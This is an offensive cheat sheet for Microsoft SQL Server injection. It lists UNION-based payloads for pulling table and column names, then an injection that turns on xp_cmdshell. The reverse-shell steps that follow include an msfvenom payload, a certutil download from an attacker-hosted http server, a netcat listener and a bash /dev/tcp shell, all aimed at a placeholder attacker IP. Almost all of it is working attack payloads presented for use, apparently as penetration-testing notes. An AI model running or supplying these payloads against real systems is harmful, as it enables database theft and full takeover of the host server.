Microsoft SQL Injection

List of commands

Basic Commands

• ?param=' OR 1=1--

• ?param=' OR 1=2--

• ?param=' ORDER BY 1,null,3,4--

• TABLE NAME: ?param=' UNION SELECT table_name FROM information_schema.tables--

• COLUMN NAME: ?param=' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table1'--

• MODIFIED UNION: ?param=' UnIoN SELECT key1, key2, key3 FROM table1--

• NEXT

Getting Shell

Using xp_cmdshell: This is a system-extended stored procedure in Microsoft SQL Server that enables the execution of operating system commands and programs from within the SQL Server. It provides a mechanism for SQL Server to interact directly with the host operating system's command shell. By default, it is disabled on production servers, however it is possible to enable xp_cmdshell in SQL Server through EXECUTE queries if the database user is a member of the sysadmin group or has the "ALTER SETTINGS" permission.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Injection command to turn on xp_cmdshell: ?param='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

Setting up a reverse shell

On Windows:

1. Use MSFvenom to generate a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o reverse.exe

2. Set up a simple http server to host reverse shell: python3 -m http.server 8080

3. Injection command to fetch reverse shell: ?param='; EXEC xp_cmdshell 'certutil -urlcache -f http://$IP:8080/reverse.exe C:\Windows\Temp\reverse.exe'; --

4. Listener on attack machine: nc -nvlp 4444

5. Injection to execute reverse shell: ?param='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe';--

On Linux:

1. Listener on attack machine: nc -nvlp 1337

2. Injection to execute reverse shell: ?param='; EXEC xp_cmdshell '/bin/bash -i >& /dev/tcp/$IP/1337 0>&1